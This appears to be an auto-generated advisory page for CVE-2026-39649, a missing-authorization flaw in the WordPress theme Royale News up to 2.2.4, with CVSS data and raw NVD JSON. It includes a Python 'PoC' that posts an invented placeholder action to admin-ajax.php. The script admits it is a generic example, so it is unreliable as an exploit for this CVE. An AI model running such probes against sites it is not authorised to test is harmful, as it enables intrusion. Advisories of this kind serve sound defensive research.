Security Vulnerability Report
中文
CVE-2026-39649 CVSS 5.3 MEDIUM

CVE-2026-39649

Published: 2026-04-08 09:16:36
Last Modified: 2026-04-24 18:06:25

Description

Missing Authorization vulnerability in themebeez Royale News royale-news allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Royale News: from n/a through <= 2.2.4.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Royale News <= 2.2.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC for CVE-2026-39649: Missing Authorization in Royale News Theme # This script demonstrates checking for an unauthenticated action. import requests def check_poc(target_url): # Vulnerable endpoint is typically wp-admin/admin-ajax.php ajax_url = f"{target_url.rstrip('/')}/wp-admin/admin-ajax.php" # The specific 'action' parameter depends on the theme's registered hooks. # This is a generic example representing a vulnerable action. payload = { "action": "royale_news_vulnerable_action", "data": "malicious_payload" } try: response = requests.post(ajax_url, data=payload, timeout=10) # Analyze response to see if the action was executed without auth if response.status_code == 200: # Check for specific success markers in response (theme dependent) if "success" in response.text or response.headers.get('Content-Type') == 'application/json': print(f"[+] Potential Vulnerability Confirmed at {target_url}") print(f"[+] Response: {response.text[:200]}") return True print("[-] Vulnerability not detected or action parameter incorrect.") return False except requests.RequestException as e: print(f"[!] Connection Error: {e}") return False if __name__ == "__main__": target = "http://example.com" # Replace with actual target check_poc(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-39649", "sourceIdentifier": "[email protected]", "published": "2026-04-08T09:16:35.883", "lastModified": "2026-04-24T18:06:24.707", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in themebeez Royale News royale-news allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Royale News: from n/a through <= 2.2.4."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/royale-news/vulnerability/wordpress-royale-news-theme-2-2-4-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}